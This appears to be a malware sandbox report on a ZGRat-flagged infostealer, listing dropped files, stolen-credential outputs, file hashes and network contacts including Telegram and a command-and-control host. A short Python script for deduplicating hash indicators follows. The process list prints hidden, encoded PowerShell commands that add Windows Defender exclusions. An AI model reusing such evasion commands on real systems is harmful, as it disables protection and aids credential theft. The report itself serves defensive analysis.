memory/4924-1032-0x00000000058D0000-0x00000000058D8000-memory.dmp
memory/4924-1030-0x0000000005810000-0x00000000058A2000-memory.dmp
memory/4924-1035-0x0000000006820000-0x000000000683E000-memory.dmp
memory/4924-1034-0x0000000006800000-0x0000000006808000-memory.dmp
memory/4924-1033-0x00000000067F0000-0x00000000067FA000-memory.dmp
C:\Users\Admin\AppData\Local\a3c3eac75a665cb7955b2c5159e1dfed\Admin@AAKWQUEG_en-US\System\Apps.txt
| MD5 | b1d58554f33c991f9454f81bf1f6a7a6 |
| SHA1 | 1a9c0748fbb4c4974315f6a3188ffb5078372de1 |
| SHA256 | 2809730601ec3cd803e75dded9788afc2683f6562378a497e7300fd83137838c |
| SHA512 | ef961a73b2b8844155d1684a6d5e0319ad5d0c8cb2c60e4ed16b03cca69e04bf9872f2bff8fdf24d3bf284366f2b2f0d36f1e4c1cd5d007732c3ad0af562d5c6 |
memory/4924-1223-0x0000000002CA0000-0x0000000002CB0000-memory.dmp
memory/4924-1226-0x0000000006C40000-0x0000000006CBA000-memory.dmp
memory/4924-1298-0x0000000007100000-0x00000000071B2000-memory.dmp
C:\Users\Admin\AppData\Local\a3c3eac75a665cb7955b2c5159e1dfed\Admin@AAKWQUEG_en-US\System\ProductKey.txt
| MD5 | 71eb5479298c7afc6d126fa04d2a9bde |
| SHA1 | a9b3d5505cf9f84bb6c2be2acece53cb40075113 |
| SHA256 | f6cadfd4e4c25ff3b8cffe54a2af24a757a349abbf4e1142ec4c9789347fe8b3 |
| SHA512 | 7c6687e21d31ec1d6d2eff04b07b465f875fd80df26677f1506b14158444cf55044eb6674880bd5bd44f04ff73023b26cb19b8837427a1d6655c96df52f140bd |
C:\Users\Admin\AppData\Local\a3c3eac75a665cb7955b2c5159e1dfed\Admin@AAKWQUEG_en-US\System\Debug.txt
| MD5 | e08defb48fa31212026eba24f895a35f |
| SHA1 | c0b9d3c1aec64bf21af878cab77d67999399437d |
| SHA256 | e32ef5b1291cd83151ccce58e0a74f9fc287cbb4276670407972b1f79a2f561e |
| SHA512 | 6beb8c75d37b99674e28010cf6f1bc3862632cc299e1a297c0dfcd987771c5f1249d1818b5b0800b30b478fcf6e83392f75436ec186f3d1c73de67974958ff8d |
C:\Users\Admin\AppData\Local\a3c3eac75a665cb7955b2c5159e1dfed\Admin@AAKWQUEG_en-US\Directories\Videos.txt
| MD5 | 1fddbf1169b6c75898b86e7e24bc7c1f |
| SHA1 | d2091060cb5191ff70eb99c0088c182e80c20f8c |
| SHA256 | a67aa329b7d878de61671e18cd2f4b011d11cbac67ea779818c6dafad2d70733 |
| SHA512 | 20bfeafde7fec1753fef59de467bd4a3dd7fe627e8c44e95fe62b065a5768c4508e886ec5d898e911a28cf6365f455c9ab1ebe2386d17a76f53037f99061fd4d |
C:\Users\Admin\AppData\Local\a3c3eac75a665cb7955b2c5159e1dfed\Admin@AAKWQUEG_en-US\Directories\OneDrive.txt
| MD5 | 966247eb3ee749e21597d73c4176bd52 |
| SHA1 | 1e9e63c2872cef8f015d4b888eb9f81b00a35c79 |
| SHA256 | 8ddfc481b1b6ae30815ecce8a73755862f24b3bb7fdebdbf099e037d53eb082e |
| SHA512 | bd30aec68c070e86e3dec787ed26dd3d6b7d33d83e43cb2d50f9e2cff779fee4c96afbbe170443bd62874073a844beb29a69b10c72c54d7d444a8d86cfd7b5aa |
memory/4924-1300-0x0000000006B70000-0x0000000006B92000-memory.dmp
memory/4924-1301-0x0000000007FA0000-0x00000000082F4000-memory.dmp
C:\Users\Admin\AppData\Local\a3c3eac75a665cb7955b2c5159e1dfed\msgid.dat
| MD5 | c010c7aa7b322c786d79b8846cb067ed |
| SHA1 | fbd6564d70b404df38f7357fc5d1439cd44672a1 |
| SHA256 | 9fb3307f61d84c4da05cc9e075a5512d168db16bad673994fc44ff8489b22f6e |
| SHA512 | 1197fc5a15271d40dc3732e9ffb3dc93e148d5714e18ac66c9af7da52b3005e4ea10b848215e566576f605bd72b43d3b5a8c0d2014396d0d493de40069bb873b |
memory/4924-1313-0x00000000745C0000-0x0000000074D70000-memory.dmp
memory/4924-1314-0x0000000002CA0000-0x0000000002CB0000-memory.dmp
memory/4924-1315-0x0000000002CA0000-0x0000000002CB0000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-01-19 20:19
Reported
2024-01-19 20:23
Platform
win10v2004-20231215-en
Max time kernel
0s
Max time network
94s
Command Line
Signatures
Enumerates physical storage devices
Processes
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Avjteuhlk.dat
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 208.194.73.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.179.17.96.in-addr.arpa | udp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-01-19 20:19
Reported
2024-01-19 20:23
Platform
win10v2004-20231215-en
Max time kernel
2s
Max time network
88s
Command Line
Signatures
Detect ZGRat V1
ZGRat
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
Processes
C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Binded.exe
"C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Binded.exe"
C:\Users\Admin\AppData\Local\Temp\blbrok.exe
"C:\Users\Admin\AppData\Local\Temp\blbrok.exe"
C:\Users\Admin\AppData\Local\Temp\rock.exe
"C:\Users\Admin\AppData\Local\Temp\rock.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABUAHkAcABlAEkAZAAuAGUAeABlADsA
C:\Users\Admin\AppData\Local\Hash\mdvhj\TypeId.exe
C:\Users\Admin\AppData\Local\Hash\mdvhj\TypeId.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABUAHkAcABlAEkAZAAuAGUAeABlADsA
C:\Users\Admin\AppData\Local\Temp\nxryyws.exe
C:\Users\Admin\AppData\Local\Temp\nxryyws.exe
C:\Users\Admin\AppData\Local\Temp\nxryyws.exe
C:\Users\Admin\AppData\Local\Temp\nxryyws.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | 79.121.231.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.160.77.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.179.17.96.in-addr.arpa | udp |
| FR | 194.33.191.53:58001 | | tcp |
| US | 8.8.8.8:53 | magic.poisontoolz.com | udp |
| US | 104.21.10.90:443 | magic.poisontoolz.com | tcp |
| US | 8.8.8.8:53 | 90.10.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.191.33.194.in-addr.arpa | udp |
| FR | 194.33.191.53:58001 | | tcp |
| US | 104.21.10.90:443 | magic.poisontoolz.com | tcp |
Files
memory/1200-0-0x0000000000E10000-0x0000000001382000-memory.dmp
memory/1200-1-0x00007FF80F340000-0x00007FF80FE01000-memory.dmp
memory/1200-2-0x0000000001B80000-0x0000000001B90000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\rock.exe
| MD5 | b5a9a31834ca48de5da58107f646a2a6 |
| SHA1 | 18de389616225e3d740d288262a5c5bca5f11fc4 |
| SHA256 | 52df0926bf74c947e9959bd680421d47dab959a0fa12402127c7eb587b7a1d95 |
| SHA512 | eeed1552481a59c748feb68f5d9d701e261d2e4bd250ecb399274b4f5bca8101a35520cf2891447ba3cdded40ceca70e546d3090abd1eaf979c0a16a661c566b |
C:\Users\Admin\AppData\Local\Temp\rock.exe
| MD5 | 69e9f5b9e1c5ef06143471ae6022f996 |
| SHA1 | fb74e045c41ef9fa9a11d3ec88ace82bb82f1729 |
| SHA256 | 70ba794963458cf9a8373869cf91aa234ecbdd596d2069237d1282718c3a68e7 |
| SHA512 | 57f75155c86a1079bfdc735a96c5ea6438e5227fc4e5b15ebd7fb329929a54e0d434700508700b1083d3fdc08a99b13c4e4cad9e33d621a6a8f4aaaa1272df87 |
C:\Users\Admin\AppData\Local\Temp\blbrok.exe
| MD5 | 6fba0bc9d0671236ec252f7c5b014d57 |
| SHA1 | ab4a0d7bd02e3c1d259553085214ae6f5dae3177 |
| SHA256 | 7c6c4ec6dbd68f2c0947cb46d6d3d4b091321c2209344332b59d97e177b6ca83 |
| SHA512 | 8b69836353df340a1df412e6e926d41c2e1a9d3cb2ae6cbf751f4d68990f1c92475492aab0ef52e364329303018a4e3999d4cae72de2ae9a13aa9af249783d43 |
memory/2576-32-0x0000027390990000-0x0000027390B08000-memory.dmp
memory/1200-34-0x00007FF80F340000-0x00007FF80FE01000-memory.dmp
memory/2576-33-0x00007FF80F340000-0x00007FF80FE01000-memory.dmp
memory/3892-36-0x0000000000B80000-0x0000000000C1C000-memory.dmp
memory/3892-35-0x0000000074BB0000-0x0000000075360000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\rock.exe
| MD5 | e483b733c95b33af0dc4257eeaf24ff2 |
| SHA1 | 8e51b0545596abb59361dd71999524eebd481908 |
| SHA256 | 562bfea0a5e27bb37cfdcf26397989d7a1b48ee34dbe0ceeaf50c2a5b110791f |
| SHA512 | 8db7cc418ffea771f6937e326bec01f86a48ddd1019998e6217d2d0cc532301b33a0a05aa6b377c7b9e549093dd95ca69a8bce9728223e8bb055d2d1ee640f83 |
memory/2576-37-0x00000273AB170000-0x00000273AB180000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\blbrok.exe
| MD5 | 21656b2a4a4b65faff027532bd7f1504 |
| SHA1 | 957cf154d9447d2bb1498fab227b0ced0bf65d2c |
| SHA256 | 49e25464f406c4df62df2ef15bebc68f36058d0feb9fae1ff60d6441d2528b36 |
| SHA512 | 7980929460c9d0d4eb453571b201b08e9db272b4bc3dad242b6d66cd4db066253bf25f6e1678094d170f24295c8eb5c9cf9930c5395e22fd15b102219541db91 |
C:\Users\Admin\AppData\Local\Temp\blbrok.exe
| MD5 | c1fcd3f9800bbfb95a0e9c2cb7ca20b2 |
| SHA1 | c65076ad5f65b7fe8e72cf7db2d0da7fe6d16d53 |
| SHA256 | 1b297af1fd0406ddf9f645636db79438761650b3d03adba24c2739d137fcaf14 |
| SHA512 | 4867f657c6d060308364310dc53eaad7835f8721cac5f1eaa965716859d5293aca31ed0bd55fa3266c76ad8298a872fa96e2717440438ec533d65072b82b31ce |
memory/3892-38-0x0000000005490000-0x00000000054A0000-memory.dmp
memory/3892-39-0x00000000054A0000-0x0000000005588000-memory.dmp
memory/3892-41-0x00000000054A0000-0x0000000005582000-memory.dmp
memory/3892-43-0x00000000054A0000-0x0000000005582000-memory.dmp
memory/3892-52-0x00000000054A0000-0x0000000005582000-memory.dmp
memory/3892-58-0x00000000054A0000-0x0000000005582000-memory.dmp
memory/3892-60-0x00000000054A0000-0x0000000005582000-memory.dmp
memory/3892-64-0x00000000054A0000-0x0000000005582000-memory.dmp
memory/3892-70-0x00000000054A0000-0x0000000005582000-memory.dmp
memory/2576-73-0x00000273AB100000-0x00000273AB150000-memory.dmp
memory/3892-75-0x00000000054A0000-0x0000000005582000-memory.dmp
memory/3892-82-0x00000000054A0000-0x0000000005582000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Data\Passwords.txt
| MD5 | 36f6acc2229073f5bb4074cee73d1d5b |
| SHA1 | b2adbb44350d984dff40c15fcbbeb3379c7ec0e5 |
| SHA256 | 8a947e0921f9cfada15c19a72f0ff31b38ad4602106c6ee95685d61c223c9a35 |
| SHA512 | da8b627bd674ceb0da7e30ba543ab82ab694d3f6e0474b48ca343ee74e20147440d2205b6ce66f5caa2a39061dedd2ca4146e263fac9f146a228c5b5cba4aaad |
memory/3892-115-0x00000000054A0000-0x0000000005582000-memory.dmp
memory/3892-121-0x00000000054A0000-0x0000000005582000-memory.dmp
memory/3892-127-0x00000000054A0000-0x0000000005582000-memory.dmp
memory/3892-135-0x00000000054A0000-0x0000000005582000-memory.dmp
memory/3892-137-0x00000000054A0000-0x0000000005582000-memory.dmp
memory/3892-133-0x00000000054A0000-0x0000000005582000-memory.dmp
memory/3892-131-0x00000000054A0000-0x0000000005582000-memory.dmp
memory/3892-129-0x00000000054A0000-0x0000000005582000-memory.dmp
memory/3892-125-0x00000000054A0000-0x0000000005582000-memory.dmp
memory/3892-123-0x00000000054A0000-0x0000000005582000-memory.dmp
memory/3892-119-0x00000000054A0000-0x0000000005582000-memory.dmp
memory/3892-117-0x00000000054A0000-0x0000000005582000-memory.dmp
memory/3892-113-0x00000000054A0000-0x0000000005582000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Data\Histories.txt
| MD5 | 412ec159e4b14be1ca93db473e80acc2 |
| SHA1 | 8909b6f7fc8715a749270b6ceb8f05f823f59fd3 |
| SHA256 | eaff9c24df526e9c884832130bf6de9182fd96f3dcdba33e8e5e7a4ed37f1bbe |
| SHA512 | a90524333fd34d44f5784a90ada19904ea7379de26cae08ffdfd2ee25b3fd5b36c2cbcf7a7e6fc4ff734680ca1ff177ed42df1d4f5583d6a1a89d622c183f0b4 |
C:\Users\Admin\AppData\Local\Temp\Data\Downloads.txt
| MD5 | ae0f7fab163139c661e576fe0af08651 |
| SHA1 | 7545ab94360fd93f2209021b4cecabb92592be27 |
| SHA256 | 832ff6318e2c78ac1907c74f3911f8815b545c16449cbce6753e21fb723cb657 |
| SHA512 | a3e342a3c72c079db96a8d6bb108830c3a772b926be0cf4e5d09ebb09e1babbc7602959bf1f82c8df8764f45479f318c3205114f23c96fd663efa792cff86b8b |
C:\Users\Admin\AppData\Local\Temp\Data\CreditCards.txt
| MD5 | 0f5f7a38759e578c92bcf62c45d80b8a |
| SHA1 | 211e70ede55cce5bf67f685d85cbd030a8517d2b |
| SHA256 | 39059fc9bf3844dacbe329b623ca7a06f72656216dd4e52dc9b938b3d95289dc |
| SHA512 | 8130466f8ee346c0b931a34e63e2e9dc6f4070b85faaa58efdddd4d165fa605457d3137472c5fd09da87b0135a4beb660ee39cb390d78be6f0786950036b205d |
C:\Users\Admin\AppData\Local\Temp\Data\Autofills.txt
| MD5 | 6be6fdca0cfa94635b8689b2b0bf2bee |
| SHA1 | 379c61029b5443c3d3df7c770423e40618b36d15 |
| SHA256 | 5bc3a7ced261f235f4a30797ad96f803c9e022a95ad6bc7fedc06d0fd2a0abeb |
| SHA512 | 7955fb48977c971563b10420e379ebea01e42582a8dfe2719ec756dda7e757168031a58a3c9fef061c0abb6c799579f7c8b46de4fc5b4ab3519d735092848cd8 |
memory/3892-90-0x00000000054A0000-0x0000000005582000-memory.dmp
memory/3892-72-0x00000000054A0000-0x0000000005582000-memory.dmp
memory/3892-68-0x00000000054A0000-0x0000000005582000-memory.dmp
memory/3892-66-0x00000000054A0000-0x0000000005582000-memory.dmp
memory/3892-62-0x00000000054A0000-0x0000000005582000-memory.dmp
memory/3892-56-0x00000000054A0000-0x0000000005582000-memory.dmp
memory/3892-54-0x00000000054A0000-0x0000000005582000-memory.dmp
memory/3892-50-0x00000000054A0000-0x0000000005582000-memory.dmp
memory/3892-48-0x00000000054A0000-0x0000000005582000-memory.dmp
memory/3892-46-0x00000000054A0000-0x0000000005582000-memory.dmp
memory/3892-40-0x00000000054A0000-0x0000000005582000-memory.dmp
memory/2576-463-0x00007FF80F340000-0x00007FF80FE01000-memory.dmp
memory/3892-2288-0x0000000005690000-0x00000000056DC000-memory.dmp
memory/3892-2287-0x0000000005630000-0x0000000005686000-memory.dmp
memory/3892-2289-0x0000000005850000-0x00000000058B6000-memory.dmp
memory/3892-2290-0x0000000005C70000-0x0000000005CC4000-memory.dmp
memory/3892-2293-0x0000000074BB0000-0x0000000075360000-memory.dmp
memory/2168-2296-0x0000020630B40000-0x0000020630B50000-memory.dmp
memory/2168-2306-0x00000206490D0000-0x00000206490F2000-memory.dmp
memory/2168-2307-0x0000020630B40000-0x0000020630B50000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_joffblep.we4.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2168-2295-0x0000020630B40000-0x0000020630B50000-memory.dmp
memory/2168-2294-0x00007FF80EF30000-0x00007FF80F9F1000-memory.dmp
memory/2168-2310-0x00007FF80EF30000-0x00007FF80F9F1000-memory.dmp
C:\Users\Admin\AppData\Local\Hash\mdvhj\TypeId.exe
| MD5 | b436f694b4f5182e9f31c4eae47bb0fb |
| SHA1 | 3d0d136ec3e24c2dbc205b71770c6125effc8936 |
| SHA256 | 08206dcfb5782fa050ae2462abc8076fe4a72defb96db46c8bde9f6295746e79 |
| SHA512 | 7e2cda355d78dfe8f23a6709967c327f871628e6f9cff879d32adcd58dfde62963eca1c04cb442fd548ccc67b444b8a9329617d775504c3654c5910e12f7cfc9 |
C:\Users\Admin\AppData\Local\Hash\mdvhj\TypeId.exe
| MD5 | 06bf68af8360c9c6fe3ebd5f59c03495 |
| SHA1 | 9149177f83ff4da16ab8bb9b77c94e5b55f3b454 |
| SHA256 | fd9fd323b5934ecfc817a62a688a428bae61bbc80a12e43fe20637e9bfc47a50 |
| SHA512 | 95435c8c23b7c295fd08a0cd200c95d29183e5675a71f32ba6a6feba8bbee2ec8657d7364c97a46f6bf3fed404732898720768a56a48ece29ad8cd5b64266915 |
memory/3984-2314-0x0000000002930000-0x0000000002940000-memory.dmp
memory/3984-2313-0x0000000074BB0000-0x0000000075360000-memory.dmp
memory/2960-4522-0x0000000005490000-0x00000000054A0000-memory.dmp
memory/3984-4523-0x0000000074BB0000-0x0000000075360000-memory.dmp
memory/2960-4521-0x0000000074BB0000-0x0000000075360000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
memory/1148-5654-0x00007FF80EF30000-0x00007FF80F9F1000-memory.dmp
memory/1148-5656-0x0000028263D40000-0x0000028263D50000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 77d622bb1a5b250869a3238b9bc1402b |
| SHA1 | d47f4003c2554b9dfc4c16f22460b331886b191b |
| SHA256 | f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb |
| SHA512 | d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9 |
memory/1148-5989-0x0000028263D40000-0x0000028263D50000-memory.dmp
memory/1148-6205-0x0000028263D40000-0x0000028263D50000-memory.dmp
memory/1148-6745-0x00007FF80EF30000-0x00007FF80F9F1000-memory.dmp
memory/2960-6746-0x0000000074BB0000-0x0000000075360000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\nxryyws.exe
| MD5 | 0b97baabefc29ff0dffd2ccaab0a208f |
| SHA1 | aac9bed37cabfc6728ecd4d3d5e241c965071a0e |
| SHA256 | ebf6065c587ef7db9230d9811d4cb4d2bb3e9f947036c7f3aae704e77137bb32 |
| SHA512 | 71a5712b119249a583b59688bb2e461cb7b320fd1575ed3fc8c5ced95b75405b7dab2194035d2a511ae9a6529968711c599942077efc3bece6d5f6ec1f6a48d9 |
memory/2576-6751-0x00000000001F0000-0x000000000020C000-memory.dmp
memory/2576-6752-0x0000000074BB0000-0x0000000075360000-memory.dmp
memory/2576-6753-0x0000000004A70000-0x0000000004A80000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\nxryyws.exe
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
(These are the digests of a zero-length file: the sandbox snapshotted nxryyws.exe at creation, before any content had been written. They match every empty file and are not usable as indicators; the other entries for this path are snapshots taken after content was written.)
memory/2576-6754-0x0000000005580000-0x00000000056B6000-memory.dmp
memory/2576-7687-0x00000000056B0000-0x00000000056B1000-memory.dmp
memory/2576-7688-0x00000000058B0000-0x000000000597E000-memory.dmp
memory/2576-7689-0x0000000006160000-0x0000000006704000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\nxryyws.exe.log
| MD5 | c3941d9fa38f1717d5cecd7a2ca71667 |
| SHA1 | 33b5362675383b58b4166ed9f9a61e5aa6768d2e |
| SHA256 | f1ed6ff1cd3df219061e32df1c75d6f48de6484cf50e5ea7d86cd8bcfcb93256 |
| SHA512 | 98f103ef97d32bf8c0566a6f6da5cf8d58d18f698c1b3e5bd0be0ea8462f5fe54c2e5e6b5188f2b7d8f70082ffd6745b1f7f6cab95af474e2b7eaed50a9d9c45 |
memory/3560-7694-0x0000000000400000-0x0000000000578000-memory.dmp
memory/3560-7697-0x0000000005830000-0x00000000058C2000-memory.dmp
memory/3560-7698-0x0000000005A80000-0x0000000005A90000-memory.dmp
memory/2576-7696-0x0000000074BB0000-0x0000000075360000-memory.dmp
memory/3560-7695-0x0000000074BB0000-0x0000000075360000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\nxryyws.exe
| MD5 | 20431b8ed3a072f81845a821249a01af |
| SHA1 | 6f15694b5fde1fdec4674928226f45499522f141 |
| SHA256 | 56743a8bbb6d27acad0101d325b1a264156394dd11908da039f95209e5a0d388 |
| SHA512 | fa391aafbf5a81f868f1559e24ee040b5c0c7cf5be5e20669fdefbcc68daeae355899fe9723e245cd76d272ab0fce024896badc3002914264caf6ed031ece4fe |
memory/3560-7699-0x0000000006770000-0x000000000677A000-memory.dmp
memory/3560-7700-0x0000000008FD0000-0x0000000009020000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Data\Cookies.txt
| MD5 | 824ce7c07117a630e9b31638f89476aa |
| SHA1 | 2d012f1cd8b636de1662f69d213b3cf9fa5df846 |
| SHA256 | 4d1a2351c6146b7f0cc87825160516933201af5e737028b360d4ee8d0ca7fdfd |
| SHA512 | 0c0d50920055b3a2343154acbe8e6d1a3490ce7ae403a21a9b385309805338ba05163500439ab85d30d1d2bb5c742009bb2b0c25d74533ba24780d31efe5c945 |
memory/3560-7741-0x0000000074BB0000-0x0000000075360000-memory.dmp
memory/3560-7740-0x0000000005A80000-0x0000000005A90000-memory.dmp
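The Files list above records the same dropped path several times with different hashes, one of them the zero-length capture. The helper below is an added example, not part of the sandbox or the sample: it parses the report's own path-plus-hash-table layout, discards any snapshot whose digest is that of the empty input, and collapses the rest into one indicator per distinct SHA256. The sample lines are copied from this report (three nxryyws.exe entries and the Passwords.txt artefact); the function and constant names are the example's own.

```python
"""Collapse a sandbox report's 'Files' hash tables into one IOC per SHA256,
skipping zero-length snapshots taken at file creation."""
import hashlib
import re
from collections import defaultdict

# Digests of the empty input, computed rather than hard-coded so the check
# cannot drift from the algorithm.
EMPTY_DIGESTS = {
    "MD5": hashlib.md5(b"").hexdigest(),
    "SHA1": hashlib.sha1(b"").hexdigest(),
    "SHA256": hashlib.sha256(b"").hexdigest(),
    "SHA512": hashlib.sha512(b"").hexdigest(),
}

HASH_ROW = re.compile(r"^\|\s*(MD5|SHA1|SHA256|SHA512)\s*\|\s*([0-9a-fA-F]+)\s*\|$")
WIN_PATH = re.compile(r"^[A-Za-z]:\\")

# Copied from the report above; memory dump names are interleaved as in the original.
FILES_SAMPLE = r"""
C:\Users\Admin\AppData\Local\Temp\Data\Passwords.txt
| MD5 | 36f6acc2229073f5bb4074cee73d1d5b |
| SHA1 | b2adbb44350d984dff40c15fcbbeb3379c7ec0e5 |
| SHA256 | 8a947e0921f9cfada15c19a72f0ff31b38ad4602106c6ee95685d61c223c9a35 |
memory/3892-115-0x00000000054A0000-0x0000000005582000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\nxryyws.exe
| MD5 | 0b97baabefc29ff0dffd2ccaab0a208f |
| SHA1 | aac9bed37cabfc6728ecd4d3d5e241c965071a0e |
| SHA256 | ebf6065c587ef7db9230d9811d4cb4d2bb3e9f947036c7f3aae704e77137bb32 |
C:\Users\Admin\AppData\Local\Temp\nxryyws.exe
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
C:\Users\Admin\AppData\Local\Temp\nxryyws.exe
| MD5 | 20431b8ed3a072f81845a821249a01af |
| SHA1 | 6f15694b5fde1fdec4674928226f45499522f141 |
| SHA256 | 56743a8bbb6d27acad0101d325b1a264156394dd11908da039f95209e5a0d388 |
""".strip().splitlines()


def parse_files_section(lines):
    """Yield (path, {algo: digest}) for every Windows path followed by a hash
    table.  Headings and memory/... dump names are skipped."""
    path, hashes = None, {}
    for raw in lines:
        line = raw.strip()
        m = HASH_ROW.match(line)
        if m and path is not None:
            hashes[m.group(1)] = m.group(2).lower()
            continue
        if path is not None and hashes:
            yield path, hashes
        path, hashes = (line, {}) if WIN_PATH.match(line) else (None, {})
    if path is not None and hashes:
        yield path, hashes


def is_empty_file(hashes):
    """True when any reported digest equals the digest of the empty input."""
    return any(hashes.get(algo) == digest for algo, digest in EMPTY_DIGESTS.items())


def triage(lines):
    """Return (iocs, empty_snapshots): iocs maps SHA256 -> sorted paths written
    with that content; empty_snapshots lists paths captured at zero length."""
    iocs, empty = defaultdict(set), []
    for path, hashes in parse_files_section(lines):
        if is_empty_file(hashes):
            empty.append(path)
        elif "SHA256" in hashes:
            iocs[hashes["SHA256"]].add(path)
    return {sha: sorted(paths) for sha, paths in iocs.items()}, empty


if __name__ == "__main__":
    iocs, empty = triage(FILES_SAMPLE)
    for sha, paths in iocs.items():
        print(sha, *paths)
    print("empty snapshots:", empty)
```

On the sample this yields three indicators (two distinct builds of nxryyws.exe plus the stolen-credential text file) and reports the d41d8cd9... entry as an empty snapshot rather than an IOC.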
Analysis: behavioral12
Detonation Overview
Submitted
2024-01-19 20:19
Reported
2024-01-19 20:23
Platform
